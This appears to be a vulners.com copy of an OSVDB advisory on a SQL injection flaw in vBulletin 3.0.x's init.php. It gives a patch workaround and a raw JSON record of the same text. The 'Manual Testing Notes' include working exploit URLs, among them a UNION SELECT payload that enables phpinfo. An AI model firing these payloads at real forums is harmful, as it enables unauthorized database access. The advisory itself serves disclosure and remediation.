Search...

vBulletin init.php SQL Injection

2005-01-02T07:09:55

ID OSVDB:12702
Type osvdb
Reporter al3ndaleeb(al3ndaleeb@uk2.net)
Modified 2005-01-02T07:09:55

Description

Vulnerability Description

vBulletin contains a flaw that will allow an attacker to inject arbitrary SQL code. The problem is that the specialtemplates variable in the init.php file is not verified properly and will allow an attacker to inject or manipulate SQL queries.

Solution Description

Upgrade to version 3.0.5 or higher, as it has been reported to fix this vulnerability. It is also possible to correct the flaw by implementing the following workaround(s): Open init.php file and search for:

$datastoretemp = $DB_site->query(" SELECT title, data FROM " . TABLE_PREFIX . "datastore WHERE title IN ('" . implode("', '", $specialtemplates) . "') "); unset($specials, $specialtemplates);

So, replace with these lines:

if(!is_array($specialtemplates)) exit;

$specialtemplate = array(); foreach ($specialtemplates AS $arrykey => $arryval) { $specialtemplate[] = addslashes($specialtemplates["$arrykey"]); }

$datastoretemp = $DB_site->query(" SELECT title, data FROM " . TABLE_PREFIX . "datastore WHERE title IN ('" . implode("', '", $specialtemplate) . "') ");

unset($specials, $specialtemplates, $specialtemplate);

Short Description

Manual Testing Notes

An exploit example:

http://[victim]/forum/global.php?specialtemplates=al3ndaleeb') http://[victim]/forum/global.php?do=phpinfo&specialtemplates[]=al3ndaleeb') UNION SELECT concat('options') as title,concat('a:4:{s:15:"templateversion";s:5:"3.0.3";s:12:"allowphpinfo";s:1:"1";s:10:"languageid";s:1:"1";s:7:"styleid";s:1:"1";}') as data/*

References:

Vendor URL: http://www.vbulletin.com/ Vendor Specific Solution URL: http://www.vbulletin.com/forum/showthread.php?postid=791268 Other Advisory URL: http://beyonce.beyondsecurity.com/unixfocus/5HP050KEKM.html

JSON Vulners Source

Initial Source

{"type": "osvdb", "published": "2005-01-02T07:09:55", "href": "https://vulners.com/osvdb/OSVDB:12702", "hashmap": [{"key": "affectedSoftware", "hash": "21a65aafa0a84ba0e5630b5a71deee47"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "6595ad8df22c82c8936b0e367316b0bd"}, {"key": "href", "hash": "26c21e0b6e3c0ce6f6ff7408e5428bbb"}, {"key": "modified", "hash": "a9e499b5f57d711730c732a058c88263"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "a9e499b5f57d711730c732a058c88263"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "bc2eeac041d544aeea144b2b03bb458f"}, {"key": "title", "hash": "baac558fb8595896eee8829b5bcac87b"}, {"key": "type", "hash": "1327ac71f7914948578f08c54f772b10"}], "bulletinFamily": "software", "cvss": {"vector": "NONE", "score": 0.0}, "viewCount": 0, "history": [], "edition": 1, "objectVersion": "1.2", "reporter": "al3ndaleeb(al3ndaleeb@uk2.net)", "title": "vBulletin init.php SQL Injection", "affectedSoftware": [{"operator": "eq", "version": "3.0.0", "name": "vBulletin"}, {"operator": "eq", "version": "3.0.2", "name": "vBulletin"}, {"operator": "eq", "version": "3.0.1", "name": "vBulletin"}, {"operator": "eq", "version": "3.0.3", "name": "vBulletin"}, {"operator": "eq", "version": "3.0.4", "name": "vBulletin"}], "enchantments": {"score": {"vector": "NONE", "value": 7.5}, "vulnersScore": 7.5}, "references": [], "id": "OSVDB:12702", "hash": "a85f49b81a1b07c0e893f447afb82da10504eb8b1817cce72b3979477e7acd29", "lastseen": "2017-04-28T13:20:08", "cvelist": [], "modified": "2005-01-02T07:09:55", "description": "## Vulnerability Description\nvBulletin contains a flaw that will allow an attacker to inject arbitrary SQL code. The problem is that the specialtemplates variable in the init.php file is not verified properly and will allow an attacker to inject or manipulate SQL queries.\n## Solution Description\nUpgrade to version 3.0.5 or higher, as it has been reported to fix this vulnerability. It is also possible to correct the flaw by implementing the following workaround(s): Open init.php file and search for:\n\n$datastoretemp = $DB_site->query(\"\nSELECT title, data\nFROM \" . TABLE_PREFIX . \"datastore\nWHERE title IN ('\" . implode(\"', '\", $specialtemplates) . \"')\n\");\nunset($specials, $specialtemplates);\n\nSo, replace with these lines:\n\nif(!is_array($specialtemplates))\n exit;\n\n$specialtemplate = array();\nforeach ($specialtemplates AS $arrykey => $arryval) {\n $specialtemplate[] = addslashes($specialtemplates[\"$arrykey\"]);\n}\n\n$datastoretemp = $DB_site->query(\"\nSELECT title, data\nFROM \" . TABLE_PREFIX . \"datastore\nWHERE title IN ('\" . implode(\"', '\", $specialtemplate) . \"')\n\");\n\nunset($specials, $specialtemplates, $specialtemplate);\n## Short Description\nvBulletin contains a flaw that will allow an attacker to inject arbitrary SQL code. The problem is that the specialtemplates variable in the init.php file is not verified properly and will allow an attacker to inject or manipulate SQL queries.\n## Manual Testing Notes\nAn exploit example:\n\nhttp://[victim]/forum/global.php?specialtemplates=al3ndaleeb')\nhttp://[victim]/forum/global.php?do=phpinfo&specialtemplates[]=al3ndaleeb')\nUNION SELECT concat('options') as title,concat('a:4:{s:15:\"templateversion\";s:5:\"3.0.3\";s:12:\"allowphpinfo\";s:1:\"1\";s:10:\"languageid\";s:1:\"1\";s:7:\"styleid\";s:1:\"1\";}') as data/*\n## References:\nVendor URL: http://www.vbulletin.com/\nVendor Specific Solution URL: http://www.vbulletin.com/forum/showthread.php?postid=791268\nOther Advisory URL: http://beyonce.beyondsecurity.com/unixfocus/5HP050KEKM.html\n"}